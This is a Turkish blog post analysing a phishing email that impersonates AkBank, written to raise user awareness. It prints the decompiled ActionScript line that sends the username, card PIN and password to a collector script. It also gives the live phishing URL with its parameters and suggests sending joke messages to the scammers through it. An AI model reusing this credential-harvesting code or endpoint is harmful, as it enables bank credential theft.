Sahte AkBank uyarı e-Postasına dikkat

Az önce elime bir e-posta geçti. AkBank adına Interaktif Bankacilik Hesabiniz konusu ile yollanmıştı. O an şüphelendim zaten, çünkü AkBank ile çalışmıyorum 🙂 E-posta’nın içeriğinde, AkBank hesabımın online bankacılık hizmet süresinin dolmak üzere olduğunun ve altta sunulan bağlantı üzerinden hesabıma erişerek, aktivasyon işlemimi tekrar gerçekleştirebileceğim yazıyordu.

Sahte E-Posta

Üstteki resimde, bana gelen e-postayı birebir görüyorsunuz.

Peki sahte olduğunu nasıl anlayacaksınız?

  1. Eğer benim gibi bu banka ile çalışmıyorsanız, e-posta zaten sahtedir.. Siliniz gitsin.
  2. E-posta AkBank adına acc@akbank.com.tr adresinden yollanmış olsa dahi, e-posta içerisindeki bağlantılar Akbank’ın resmi sitesine çıkmıyorsa, e-posta sahtedir.
  3. Üsttekini ispatlayalım. E-posta içerisindeki https://ticinternetsube.akbank.com.tr bağlantısına tıklayalım. Akbank Kurumsal İnternet Şubesi yerine, Akbank’ın giriş sayfasının kopyalandığını şuradaki adrese çıkıyoruz. Bu esnada uyanmanız gerekiyor. Çünkü web sayfasının adresi akbank.com.tr değil, omnilife.de/images/login olarak devam ediyor.

İstenine uygularsanız ne olur?

Sahte e-postada istenilen gibi müşteri bilgilerinizi girerseniz, Akbank hesabınıza ait online bankacılık bilgileriniz başka ellere gider.
Sahte URL üstünden 1111111111 müşteri numarası ile giriş yapıyorum. İşin komik kısmı, giriş formunun koca bir ok ile belirtilmesi 🙂

Sahte URL

Müşteri kodumu giriyorum ve yeni bir pencere içerisinde online bankacılığa giriş sayfası açılıyor. Buraya kadar herşey çok güzel hazırlanmış değil mi? Fakat sizler buraya gelmeden e-postanın sahte olduğunu, az önce yukarıda belirttiğimiz maddeler ile anlamış oldunuz. Şu an amacımız, tecrübeli olmayan internet kullanıcıların bilinçlenmesi adına sahte kullanımı sonuna kadar görüntülemek.

Yeni pencerede açılan ve asıl önemli bilgileri isteyen forma geldik. Buradaki oturum açma formu Flash ile hazırlanmış ve önemli bilgiler bu dosya üzerinden gönderiliyor olmalı. Bahsi geçen sahte Flash oturum açma dosyası ise buradaki adreste yer alıyor. Bu flash dosyasını bilgisayarıma indiriyorum ve Sothink SWF Decompiler ya da benzeri bir yazılım ile açıyorum.

Flash dosyasının içerisinde yer alan ActionScript satırlarına incelemeye başlıyorum. Ve kısa bir süre sonra görmek istediğim satıra ulaşıyorum.

[AS]tmpstr = “login.php?a1=” + USERNAME + “&a2=” + CARDPIN + “&a3=” + PAROLANIZ + “”;[/AS]

Bu satır; müşterinin kullanıcı adı, banka kartı şifresi ve parolasının yollandığı yer oluyor. Yani siz bu bilgileri girdiğinizde, login.php adresine bunlar yollanacak ve büyük ihtimalle bu bilgilerin her biri, bir veritabanında derlenecek ya da ikinci kişilerin e-postasına yollanacak. Ve kısa bir süre sonrasında banka hesabımızda değişiklikler olmaya başlayacak 🙂

İşin şaka kısmı

İşin şaka kısmı ile devam edelim öyleyse. Ne demiştik hatırlayalım öncelikle. Tüm banka bilgilerimiz sahte URL üstündeki login.php dosyasına yollanıyordu. Tabi bu bilgiler AkBank sunucularından kontrol ettirilmediği için, içeriği ne olursa olsun ikinci kişilere gidecektir. O zaman biz de bu kişilere güzel bir mesaj yollayabiliriz o form aracılığı ile.

[CODE]http://omnilife.de/images/login/login.php?a1=Müşteri adım&a2=kart şifrem&a3=parolam[/CODE]

Üstteki satırlar, önemli bilgilerin gönderildiği dosyaya çıkıyor ve buradaki a1, a2 ve a3 alanları istediğiniz metinler ile doldurduktan sonra URL adresini kopyalayarak, tarayıcıya yapıştırıp, sayfayı çağırabilirsiniz. Ne yazarsanız yazın, buradaki adrese yönlendirilerek alttaki gibi işlem başarılı mesajını alacaksınız 🙂

Sahte URL 2